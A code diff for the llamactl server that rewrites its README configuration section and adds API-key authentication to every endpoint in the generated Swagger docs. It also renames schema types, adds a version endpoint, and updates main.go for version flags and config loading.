+# Or build from source - see llama.cpp docs
+```
+## Configuration
+llamactl works out of the box with sensible defaults.
+```yaml
+server:
+  host: "0.0.0.0"                # Server host to bind to
+  port: 8080                     # Server port to bind to
+  allowed_origins: ["*"]         # Allowed CORS origins (default: all)
+  enable_swagger: false          # Enable Swagger UI for API docs
+instances:
+  port_range: [8000, 9000]       # Port range for instances
+  data_dir: ~/.local/share/llamactl             # Data directory (platform-specific, see below)
+  configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
+  logs_dir: ~/.local/share/llamactl/logs        # Logs directory
+  auto_create_dirs: true         # Auto-create data/config/logs dirs if missing
+  max_instances: -1              # Max instances (-1 = unlimited)
+  max_running_instances: -1      # Max running instances (-1 = unlimited)
+  enable_lru_eviction: true      # Enable LRU eviction for idle instances
+  llama_executable: llama-server # Path to llama-server executable
+  default_auto_restart: true     # Auto-restart new instances by default
+  default_max_restarts: 3        # Max restarts for new instances
+  default_restart_delay: 5       # Restart delay (seconds) for new instances
+  default_on_demand_start: true  # Default on-demand start setting
+  on_demand_start_timeout: 120   # Default on-demand start timeout in seconds
+  timeout_check_interval: 5      # Idle instance timeout check in minutes
+auth:
+  require_inference_auth: true   # Require auth for inference endpoints
+  inference_keys: []             # Keys for inference endpoints
+  require_management_auth: true  # Require auth for management endpoints
+  management_keys: []            # Keys for management endpoints
+```
+For detailed configuration options including environment variables, file locations, and advanced settings, see the [Configuration Guide](docs/getting-started/configuration.md).
 ## License
-This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
+MIT License - see [LICENSE](LICENSE) file.
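The rewritten README leans on two features added in this PR: API-key auth and on-demand start. A hedged sketch of how they combine, assuming `default_on_demand_start: true` from the config above and an existing but currently stopped instance named `my-7b-model` (hypothetical name):

```bash
# A chat request against a stopped instance should start it first
# (waiting up to on_demand_start_timeout seconds), then proxy the request.
curl -X POST localhost:8080/v1/chat/completions \
  -H "Authorization: Bearer your-inference-key" \
  -d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
```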

apidocs/docs.go

@@ -1,5 +1,5 @@
-// Package docs Code generated by swaggo/swag. DO NOT EDIT
-package docs
+// Package apidocs Code generated by swaggo/swag. DO NOT EDIT
+package apidocs

 import "github.com/swaggo/swag"
@@ -21,6 +21,11 @@ const docTemplate = `{
     "paths": {
         "/instances": {
             "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                 "description": "Returns a list of all instances managed by the server",
                 "tags": [
                     "instances"
@@ -32,7 +37,7 @@ const docTemplate = `{
                         "schema": {
                             "type": "array",
                             "items": {
-                                "$ref": "#/definitions/llamactl.Instance"
+                                "$ref": "#/definitions/instance.Process"
                             }
                         }
                     },
@@ -47,6 +52,11 @@ const docTemplate = `{
         },
         "/instances/{name}": {
             "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                 "description": "Returns the details of a specific instance by name",
                 "tags": [
                     "instances"
@@ -65,7 +75,7 @@ const docTemplate = `{
                     "200": {
                         "description": "Instance details",
                         "schema": {
-                            "$ref": "#/definitions/llamactl.Instance"
+                            "$ref": "#/definitions/instance.Process"
                         }
                     },
                     "400": {
@@ -83,6 +93,11 @@ const docTemplate = `{
                 }
             },
             "put": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                 "description": "Updates the configuration of a specific instance by name",
                 "consumes": [
                     "application/json"
@@ -105,7 +120,7 @@ const docTemplate = `{
                         "in": "body",
                         "required": true,
                         "schema": {
-                            "$ref": "#/definitions/llamactl.CreateInstanceOptions"
+                            "$ref": "#/definitions/instance.CreateInstanceOptions"
                         }
                     }
                 ],
@@ -113,7 +128,7 @@ const docTemplate = `{
                     "200": {
                         "description": "Updated instance details",
                         "schema": {
-                            "$ref": "#/definitions/llamactl.Instance"
+                            "$ref": "#/definitions/instance.Process"
                         }
                     },
                     "400": {
@@ -131,6 +146,11 @@ const docTemplate = `{
                 }
             },
             "post": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                 "description": "Creates a new instance with the provided configuration options",
                 "consumes": [
                     "application/json"
@@ -153,7 +173,7 @@ const docTemplate = `{
                         "in": "body",
                         "required": true,
                         "schema": {
-                            "$ref": "#/definitions/llamactl.CreateInstanceOptions"
+                            "$ref": "#/definitions/instance.CreateInstanceOptions"
                        }
                    }
                ],
@@ -161,7 +181,7 @@ const docTemplate = `{
                    "201": {
                        "description": "Created instance details",
                        "schema": {
-                            "$ref": "#/definitions/llamactl.Instance"
+                            "$ref": "#/definitions/instance.Process"
                        }
                    },
                    "400": {
@@ -179,6 +199,11 @@ const docTemplate = `{
                }
            },
            "delete": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Stops and removes a specific instance by name",
                "tags": [
                    "instances"
@@ -214,6 +239,11 @@ const docTemplate = `{
        },
        "/instances/{name}/logs": {
            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Returns the logs from a specific instance by name with optional line limit",
                "tags": [
                    "instances"
@@ -258,6 +288,11 @@ const docTemplate = `{
        },
        "/instances/{name}/proxy": {
            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Forwards HTTP requests to the llama-server instance running on a specific port",
                "tags": [
                    "instances"
@@ -297,6 +332,11 @@ const docTemplate = `{
                }
            },
            "post": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Forwards HTTP requests to the llama-server instance running on a specific port",
                "tags": [
                    "instances"
@@ -338,6 +378,11 @@ const docTemplate = `{
        },
        "/instances/{name}/restart": {
            "post": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Restarts a specific instance by name",
                "tags": [
                    "instances"
@@ -356,7 +401,7 @@ const docTemplate = `{
                    "200": {
                        "description": "Restarted instance details",
                        "schema": {
-                            "$ref": "#/definitions/llamactl.Instance"
+                            "$ref": "#/definitions/instance.Process"
                        }
                    },
                    "400": {
@@ -376,6 +421,11 @@ const docTemplate = `{
        },
        "/instances/{name}/start": {
            "post": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Starts a specific instance by name",
                "tags": [
                    "instances"
@@ -394,7 +444,7 @@ const docTemplate = `{
                    "200": {
                        "description": "Started instance details",
                        "schema": {
-                            "$ref": "#/definitions/llamactl.Instance"
+                            "$ref": "#/definitions/instance.Process"
                        }
                    },
                    "400": {
@@ -414,6 +464,11 @@ const docTemplate = `{
        },
        "/instances/{name}/stop": {
            "post": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Stops a specific instance by name",
                "tags": [
                    "instances"
@@ -432,7 +487,7 @@ const docTemplate = `{
                    "200": {
                        "description": "Stopped instance details",
                        "schema": {
-                            "$ref": "#/definitions/llamactl.Instance"
+                            "$ref": "#/definitions/instance.Process"
                        }
                    },
                    "400": {
@@ -452,6 +507,11 @@ const docTemplate = `{
        },
        "/server/devices": {
            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Returns a list of available devices for the llama server",
                "tags": [
                    "server"
@@ -475,6 +535,11 @@ const docTemplate = `{
        },
        "/server/help": {
            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Returns the help text for the llama server command",
                "tags": [
                    "server"
@@ -498,6 +563,11 @@ const docTemplate = `{
        },
        "/server/version": {
            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Returns the version of the llama server command",
                "tags": [
                    "server"
@@ -521,7 +591,12 @@ const docTemplate = `{
        },
        "/v1/": {
            "post": {
-                "description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body",
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
+                "description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the ` + "`" + `Authorization` + "`" + ` header.",
                "consumes": [
                    "application/json"
                ],
@@ -550,6 +625,11 @@ const docTemplate = `{
        },
        "/v1/models": {
            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Returns a list of instances in a format compatible with OpenAI API",
                "tags": [
                    "openai"
@@ -559,7 +639,35 @@ const docTemplate = `{
                    "200": {
                        "description": "List of OpenAI-compatible instances",
                        "schema": {
-                            "$ref": "#/definitions/llamactl.OpenAIListInstancesResponse"
+                            "$ref": "#/definitions/server.OpenAIListInstancesResponse"
+                        }
+                    },
+                    "500": {
+                        "description": "Internal Server Error",
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                }
+            }
+        },
+        "/version": {
+            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
+                "description": "Returns the version of the llamactl command",
+                "tags": [
+                    "version"
+                ],
+                "summary": "Get llamactl version",
+                "responses": {
+                    "200": {
+                        "description": "Version information",
+                        "schema": {
+                            "type": "string"
                        }
                    },
                    "500": {
@@ -573,7 +681,7 @@ const docTemplate = `{
        }
    },
    "definitions": {
-        "llamactl.CreateInstanceOptions": {
+        "instance.CreateInstanceOptions": {
            "type": "object",
            "properties": {
                "alias": {
@@ -671,7 +779,6 @@ const docTemplate = `{
                    "type": "string"
                },
                "draft_max": {
-                    "description": "Speculative decoding params",
                    "type": "integer"
                },
                "draft_min": {
@@ -777,6 +884,10 @@ const docTemplate = `{
                "host": {
                    "type": "string"
                },
+                "idle_timeout": {
+                    "description": "Idle timeout",
+                    "type": "integer"
+                },
                "ignore_eos": {
                    "type": "boolean"
                },
@@ -875,7 +986,7 @@ const docTemplate = `{
                    "type": "boolean"
                },
                "no_context_shift": {
-                    "description": "Server/Example-specific params",
+                    "description": "Example-specific params",
                    "type": "boolean"
                },
                "no_escape": {
@@ -911,6 +1022,10 @@ const docTemplate = `{
                "numa": {
                    "type": "string"
                },
+                "on_demand_start": {
+                    "description": "On demand start",
+                    "type": "boolean"
+                },
                "override_kv": {
                    "type": "array",
                    "items": {
@@ -947,10 +1062,10 @@ const docTemplate = `{
                "presence_penalty": {
                    "type": "number"
                },
-                "priority": {
+                "prio": {
                    "type": "integer"
                },
-                "priority_batch": {
+                "prio_batch": {
                    "type": "integer"
                },
                "props": {
@@ -971,8 +1086,7 @@ const docTemplate = `{
                "reranking": {
                    "type": "boolean"
                },
-                "restart_delay_seconds": {
-                    "description": "RestartDelay duration in seconds",
+                "restart_delay": {
                    "type": "integer"
                },
                "rope_freq_base": {
@@ -1021,7 +1135,7 @@ const docTemplate = `{
                "ssl_key_file": {
                    "type": "string"
                },
-                "temperature": {
+                "temp": {
                    "type": "number"
                },
                "tensor_split": {
@@ -1087,7 +1201,20 @@ const docTemplate = `{
                }
            }
        },
-        "llamactl.Instance": {
+        "instance.InstanceStatus": {
+            "type": "integer",
+            "enum": [
+                0,
+                1,
+                2
+            ],
+            "x-enum-varnames": [
+                "Stopped",
+                "Running",
+                "Failed"
+            ]
+        },
+        "instance.Process": {
            "type": "object",
            "properties": {
                "created": {
@@ -1097,13 +1224,17 @@ const docTemplate = `{
                "name": {
                    "type": "string"
                },
-                "running": {
+                "status": {
                    "description": "Status",
-                    "type": "boolean"
+                    "allOf": [
+                        {
+                            "$ref": "#/definitions/instance.InstanceStatus"
+                        }
+                    ]
                }
            }
        },
-        "llamactl.OpenAIInstance": {
+        "server.OpenAIInstance": {
            "type": "object",
            "properties": {
                "created": {
@@ -1120,13 +1251,13 @@ const docTemplate = `{
                }
            }
        },
-        "llamactl.OpenAIListInstancesResponse": {
+        "server.OpenAIListInstancesResponse": {
            "type": "object",
            "properties": {
                "data": {
                    "type": "array",
                    "items": {
-                        "$ref": "#/definitions/llamactl.OpenAIInstance"
+                        "$ref": "#/definitions/server.OpenAIInstance"
                    }
                },
                "object": {

apidocs/swagger.json

@@ -14,6 +14,11 @@
     "paths": {
         "/instances": {
             "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                 "description": "Returns a list of all instances managed by the server",
                 "tags": [
                     "instances"
@@ -25,7 +30,7 @@
                         "schema": {
                             "type": "array",
                             "items": {
-                                "$ref": "#/definitions/llamactl.Instance"
+                                "$ref": "#/definitions/instance.Process"
                             }
                         }
                     },
@@ -40,6 +45,11 @@
         },
         "/instances/{name}": {
             "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                 "description": "Returns the details of a specific instance by name",
                 "tags": [
                     "instances"
@@ -58,7 +68,7 @@
                    "200": {
                        "description": "Instance details",
                        "schema": {
-                            "$ref": "#/definitions/llamactl.Instance"
+                            "$ref": "#/definitions/instance.Process"
                        }
                    },
                    "400": {
@@ -76,6 +86,11 @@
                }
            },
            "put": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Updates the configuration of a specific instance by name",
                "consumes": [
                    "application/json"
@@ -98,7 +113,7 @@
                        "in": "body",
                        "required": true,
                        "schema": {
-                            "$ref": "#/definitions/llamactl.CreateInstanceOptions"
+                            "$ref": "#/definitions/instance.CreateInstanceOptions"
                        }
                    }
                ],
@@ -106,7 +121,7 @@
                    "200": {
                        "description": "Updated instance details",
                        "schema": {
-                            "$ref": "#/definitions/llamactl.Instance"
+                            "$ref": "#/definitions/instance.Process"
                        }
                    },
                    "400": {
@@ -124,6 +139,11 @@
                }
            },
            "post": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Creates a new instance with the provided configuration options",
                "consumes": [
                    "application/json"
@@ -146,7 +166,7 @@
                        "in": "body",
                        "required": true,
                        "schema": {
-                            "$ref": "#/definitions/llamactl.CreateInstanceOptions"
+                            "$ref": "#/definitions/instance.CreateInstanceOptions"
                        }
                    }
                ],
@@ -154,7 +174,7 @@
                    "201": {
                        "description": "Created instance details",
                        "schema": {
-                            "$ref": "#/definitions/llamactl.Instance"
+                            "$ref": "#/definitions/instance.Process"
                        }
                    },
                    "400": {
@@ -172,6 +192,11 @@
                }
            },
            "delete": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Stops and removes a specific instance by name",
                "tags": [
                    "instances"
@@ -207,6 +232,11 @@
        },
        "/instances/{name}/logs": {
            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Returns the logs from a specific instance by name with optional line limit",
                "tags": [
                    "instances"
@@ -251,6 +281,11 @@
        },
        "/instances/{name}/proxy": {
            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Forwards HTTP requests to the llama-server instance running on a specific port",
                "tags": [
                    "instances"
@@ -290,6 +325,11 @@
                }
            },
            "post": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Forwards HTTP requests to the llama-server instance running on a specific port",
                "tags": [
                    "instances"
@@ -331,6 +371,11 @@
        },
        "/instances/{name}/restart": {
            "post": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Restarts a specific instance by name",
                "tags": [
                    "instances"
@@ -349,7 +394,7 @@
                    "200": {
                        "description": "Restarted instance details",
                        "schema": {
-                            "$ref": "#/definitions/llamactl.Instance"
+                            "$ref": "#/definitions/instance.Process"
                        }
                    },
                    "400": {
@@ -369,6 +414,11 @@
        },
        "/instances/{name}/start": {
            "post": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Starts a specific instance by name",
                "tags": [
                    "instances"
@@ -387,7 +437,7 @@
                    "200": {
                        "description": "Started instance details",
                        "schema": {
-                            "$ref": "#/definitions/llamactl.Instance"
+                            "$ref": "#/definitions/instance.Process"
                        }
                    },
                    "400": {
@@ -407,6 +457,11 @@
        },
        "/instances/{name}/stop": {
            "post": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Stops a specific instance by name",
                "tags": [
                    "instances"
@@ -425,7 +480,7 @@
                    "200": {
                        "description": "Stopped instance details",
                        "schema": {
-                            "$ref": "#/definitions/llamactl.Instance"
+                            "$ref": "#/definitions/instance.Process"
                        }
                    },
                    "400": {
@@ -445,6 +500,11 @@
        },
        "/server/devices": {
            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Returns a list of available devices for the llama server",
                "tags": [
                    "server"
@@ -468,6 +528,11 @@
        },
        "/server/help": {
            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Returns the help text for the llama server command",
                "tags": [
                    "server"
@@ -491,6 +556,11 @@
        },
        "/server/version": {
            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Returns the version of the llama server command",
                "tags": [
                    "server"
@@ -514,7 +584,12 @@
        },
        "/v1/": {
            "post": {
-                "description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body",
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
+                "description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.",
                "consumes": [
                    "application/json"
                ],
@@ -543,6 +618,11 @@
        },
        "/v1/models": {
            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
                "description": "Returns a list of instances in a format compatible with OpenAI API",
                "tags": [
                    "openai"
@@ -552,7 +632,35 @@
                    "200": {
                        "description": "List of OpenAI-compatible instances",
                        "schema": {
-                            "$ref": "#/definitions/llamactl.OpenAIListInstancesResponse"
+                            "$ref": "#/definitions/server.OpenAIListInstancesResponse"
+                        }
+                    },
+                    "500": {
+                        "description": "Internal Server Error",
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                }
+            }
+        },
+        "/version": {
+            "get": {
+                "security": [
+                    {
+                        "ApiKeyAuth": []
+                    }
+                ],
+                "description": "Returns the version of the llamactl command",
+                "tags": [
+                    "version"
+                ],
+                "summary": "Get llamactl version",
+                "responses": {
+                    "200": {
+                        "description": "Version information",
+                        "schema": {
+                            "type": "string"
                        }
                    },
                    "500": {
@@ -566,7 +674,7 @@
        }
    },
    "definitions": {
-        "llamactl.CreateInstanceOptions": {
+        "instance.CreateInstanceOptions": {
            "type": "object",
            "properties": {
                "alias": {
@@ -664,7 +772,6 @@
                    "type": "string"
                },
                "draft_max": {
-                    "description": "Speculative decoding params",
                    "type": "integer"
                },
                "draft_min": {
@@ -770,6 +877,10 @@
                "host": {
                    "type": "string"
                },
+                "idle_timeout": {
+                    "description": "Idle timeout",
+                    "type": "integer"
+                },
                "ignore_eos": {
                    "type": "boolean"
                },
@@ -868,7 +979,7 @@
                    "type": "boolean"
                },
                "no_context_shift": {
-                    "description": "Server/Example-specific params",
+                    "description": "Example-specific params",
                    "type": "boolean"
                },
                "no_escape": {
@@ -904,6 +1015,10 @@
                "numa": {
                    "type": "string"
                },
+                "on_demand_start": {
+                    "description": "On demand start",
+                    "type": "boolean"
+                },
                "override_kv": {
                    "type": "array",
                    "items": {
@@ -940,10 +1055,10 @@
                "presence_penalty": {
                    "type": "number"
                },
-                "priority": {
+                "prio": {
                    "type": "integer"
                },
-                "priority_batch": {
+                "prio_batch": {
                    "type": "integer"
                },
                "props": {
@@ -964,8 +1079,7 @@
                "reranking": {
                    "type": "boolean"
                },
-                "restart_delay_seconds": {
-                    "description": "RestartDelay duration in seconds",
+                "restart_delay": {
                    "type": "integer"
                },
                "rope_freq_base": {
@@ -1014,7 +1128,7 @@
                "ssl_key_file": {
                    "type": "string"
                },
-                "temperature": {
+                "temp": {
                    "type": "number"
                },
                "tensor_split": {
@@ -1080,7 +1194,20 @@
                }
            }
        },
-        "llamactl.Instance": {
+        "instance.InstanceStatus": {
+            "type": "integer",
+            "enum": [
+                0,
+                1,
+                2
+            ],
+            "x-enum-varnames": [
+                "Stopped",
+                "Running",
+                "Failed"
+            ]
+        },
+        "instance.Process": {
            "type": "object",
            "properties": {
                "created": {
@@ -1090,13 +1217,17 @@
                "name": {
                    "type": "string"
                },
-                "running": {
+                "status": {
                    "description": "Status",
-                    "type": "boolean"
+                    "allOf": [
+                        {
+                            "$ref": "#/definitions/instance.InstanceStatus"
+                        }
+                    ]
                }
            }
        },
-        "llamactl.OpenAIInstance": {
+        "server.OpenAIInstance": {
            "type": "object",
            "properties": {
                "created": {
@@ -1113,13 +1244,13 @@
                }
            }
        },
-        "llamactl.OpenAIListInstancesResponse": {
+        "server.OpenAIListInstancesResponse": {
            "type": "object",
            "properties": {
                "data": {
                    "type": "array",
                    "items": {
-                        "$ref": "#/definitions/llamactl.OpenAIInstance"
+                        "$ref": "#/definitions/server.OpenAIInstance"
                    }
                },
                "object": {


@@ -1,6 +1,6 @@
 basePath: /api/v1
 definitions:
-  llamactl.CreateInstanceOptions:
+  instance.CreateInstanceOptions:
     properties:
       alias:
         type: string
@@ -66,7 +66,6 @@ definitions:
       device_draft:
         type: string
       draft_max:
-        description: Speculative decoding params
         type: integer
       draft_min:
         type: integer
@@ -137,6 +136,9 @@ definitions:
         type: string
       host:
         type: string
+      idle_timeout:
+        description: Idle timeout
+        type: integer
       ignore_eos:
         type: boolean
       jinja:
@@ -203,7 +205,7 @@ definitions:
       no_cont_batching:
         type: boolean
       no_context_shift:
-        description: Server/Example-specific params
+        description: Example-specific params
         type: boolean
       no_escape:
         type: boolean
@@ -227,6 +229,9 @@ definitions:
         type: boolean
       numa:
         type: string
+      on_demand_start:
+        description: On demand start
+        type: boolean
       override_kv:
         items:
           type: string
@@ -251,9 +256,9 @@ definitions:
         type: integer
       presence_penalty:
         type: number
-      priority:
+      prio:
         type: integer
-      priority_batch:
+      prio_batch:
         type: integer
       props:
         type: boolean
@@ -267,8 +272,7 @@ definitions:
         type: number
       reranking:
         type: boolean
-      restart_delay_seconds:
-        description: RestartDelay duration in seconds
+      restart_delay:
         type: integer
       rope_freq_base:
         type: number
@@ -301,7 +305,7 @@ definitions:
         type: string
       ssl_key_file:
         type: string
-      temperature:
+      temp:
         type: number
       tensor_split:
         type: string
@@ -345,18 +349,29 @@ definitions:
       yarn_orig_ctx:
         type: integer
     type: object
-  llamactl.Instance:
+  instance.InstanceStatus:
+    enum:
+    - 0
+    - 1
+    - 2
+    type: integer
+    x-enum-varnames:
+    - Stopped
+    - Running
+    - Failed
+  instance.Process:
     properties:
       created:
         description: Creation time
         type: integer
       name:
         type: string
-      running:
+      status:
+        allOf:
+        - $ref: '#/definitions/instance.InstanceStatus'
         description: Status
-        type: boolean
     type: object
-  llamactl.OpenAIInstance:
+  server.OpenAIInstance:
     properties:
       created:
         type: integer
@@ -367,11 +382,11 @@ definitions:
       owned_by:
         type: string
     type: object
-  llamactl.OpenAIListInstancesResponse:
+  server.OpenAIListInstancesResponse:
     properties:
       data:
         items:
-          $ref: '#/definitions/llamactl.OpenAIInstance'
+          $ref: '#/definitions/server.OpenAIInstance'
         type: array
       object:
         type: string
@@ -393,12 +408,14 @@ paths:
           description: List of instances
           schema:
             items:
-              $ref: '#/definitions/llamactl.Instance'
+              $ref: '#/definitions/instance.Process'
             type: array
         "500":
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: List all instances
      tags:
       - instances
@@ -422,6 +439,8 @@ paths:
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: Delete an instance
       tags:
       - instances
@@ -437,7 +456,7 @@ paths:
         "200":
           description: Instance details
           schema:
-            $ref: '#/definitions/llamactl.Instance'
+            $ref: '#/definitions/instance.Process'
         "400":
           description: Invalid name format
           schema:
@@ -446,6 +465,8 @@ paths:
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: Get details of a specific instance
       tags:
       - instances
@@ -464,12 +485,12 @@ paths:
         name: options
         required: true
         schema:
-          $ref: '#/definitions/llamactl.CreateInstanceOptions'
+          $ref: '#/definitions/instance.CreateInstanceOptions'
       responses:
         "201":
           description: Created instance details
           schema:
-            $ref: '#/definitions/llamactl.Instance'
+            $ref: '#/definitions/instance.Process'
         "400":
           description: Invalid request body
           schema:
@@ -478,6 +499,8 @@ paths:
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: Create and start a new instance
       tags:
       - instances
@@ -496,12 +519,12 @@ paths:
         name: options
         required: true
         schema:
-          $ref: '#/definitions/llamactl.CreateInstanceOptions'
+          $ref: '#/definitions/instance.CreateInstanceOptions'
       responses:
         "200":
           description: Updated instance details
           schema:
-            $ref: '#/definitions/llamactl.Instance'
+            $ref: '#/definitions/instance.Process'
         "400":
           description: Invalid name format
           schema:
@@ -510,6 +533,8 @@ paths:
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: Update an instance's configuration
       tags:
       - instances
@@ -540,6 +565,8 @@ paths:
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: Get logs from a specific instance
       tags:
       - instances
@@ -568,6 +595,8 @@ paths:
           description: Instance is not running
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: Proxy requests to a specific instance
       tags:
       - instances
@@ -595,6 +624,8 @@ paths:
           description: Instance is not running
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: Proxy requests to a specific instance
       tags:
       - instances
@@ -611,7 +642,7 @@ paths:
         "200":
           description: Restarted instance details
           schema:
-            $ref: '#/definitions/llamactl.Instance'
+            $ref: '#/definitions/instance.Process'
         "400":
           description: Invalid name format
           schema:
@@ -620,6 +651,8 @@ paths:
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: Restart a running instance
       tags:
       - instances
@@ -636,7 +669,7 @@ paths:
         "200":
           description: Started instance details
           schema:
-            $ref: '#/definitions/llamactl.Instance'
+            $ref: '#/definitions/instance.Process'
         "400":
           description: Invalid name format
           schema:
@@ -645,6 +678,8 @@ paths:
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: Start a stopped instance
       tags:
       - instances
@@ -661,7 +696,7 @@ paths:
         "200":
           description: Stopped instance details
           schema:
-            $ref: '#/definitions/llamactl.Instance'
+            $ref: '#/definitions/instance.Process'
         "400":
           description: Invalid name format
           schema:
@@ -670,6 +705,8 @@ paths:
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: Stop a running instance
       tags:
       - instances
@@ -685,6 +722,8 @@ paths:
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: List available devices for llama server
       tags:
       - server
@@ -700,6 +739,8 @@ paths:
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: Get help for llama server
       tags:
       - server
@@ -715,6 +756,8 @@ paths:
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: Get version of llama server
       tags:
       - server
@@ -723,7 +766,8 @@ paths:
       consumes:
       - application/json
       description: Handles all POST requests to /v1/*, routing to the appropriate
-        instance based on the request body
+        instance based on the request body. Requires API key authentication via the
+        `Authorization` header.
       responses:
         "200":
           description: OpenAI response
@@ -735,6 +779,8 @@ paths:
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: OpenAI-compatible proxy endpoint
       tags:
       - openai
@@ -746,12 +792,31 @@ paths:
         "200":
           description: List of OpenAI-compatible instances
           schema:
-            $ref: '#/definitions/llamactl.OpenAIListInstancesResponse'
+            $ref: '#/definitions/server.OpenAIListInstancesResponse'
         "500":
           description: Internal Server Error
           schema:
             type: string
+      security:
+      - ApiKeyAuth: []
       summary: List instances in OpenAI-compatible format
       tags:
       - openai
+  /version:
+    get:
+      description: Returns the version of the llamactl command
+      responses:
+        "200":
+          description: Version information
+          schema:
+            type: string
+        "500":
+          description: Internal Server Error
+          schema:
+            type: string
+      security:
+      - ApiKeyAuth: []
+      summary: Get llamactl version
+      tags:
+      - version
 swagger: "2.0"


@@ -2,11 +2,20 @@ package main

 import (
 	"fmt"
-	llamactl "llamactl/pkg"
+	"llamactl/pkg/config"
+	"llamactl/pkg/manager"
+	"llamactl/pkg/server"
 	"net/http"
 	"os"
+	"os/signal"
+	"syscall"
 )

+// version is set at build time using -ldflags "-X main.version=1.0.0"
+var version string = "unknown"
+var commitHash string = "unknown"
+var buildTime string = "unknown"
+
 // @title llamactl API
 // @version 1.0
 // @description llamactl is a control server for managing Llama Server instances.
@@ -15,29 +24,76 @@ import (
 // @basePath /api/v1

 func main() {
-	config, err := llamactl.LoadConfig("")
+	// --version flag to print the version
+	if len(os.Args) > 1 && os.Args[1] == "--version" {
+		fmt.Printf("llamactl version: %s\n", version)
+		fmt.Printf("Commit hash: %s\n", commitHash)
+		fmt.Printf("Build time: %s\n", buildTime)
+		return
+	}
+
+	configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
+	cfg, err := config.LoadConfig(configPath)
 	if err != nil {
 		fmt.Printf("Error loading config: %v\n", err)
 		fmt.Println("Using default configuration.")
 	}

-	// Create the log directory if it doesn't exist
-	err = os.MkdirAll(config.Instances.LogDirectory, 0755)
-	if err != nil {
-		fmt.Printf("Error creating log directory: %v\n", err)
-		return
+	// Set version information
+	cfg.Version = version
+	cfg.CommitHash = commitHash
+	cfg.BuildTime = buildTime
+
+	// Create the data directory if it doesn't exist
+	if cfg.Instances.AutoCreateDirs {
+		if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {
+			fmt.Printf("Error creating config directory %s: %v\n", cfg.Instances.InstancesDir, err)
+			fmt.Println("Persistence will not be available.")
+		}
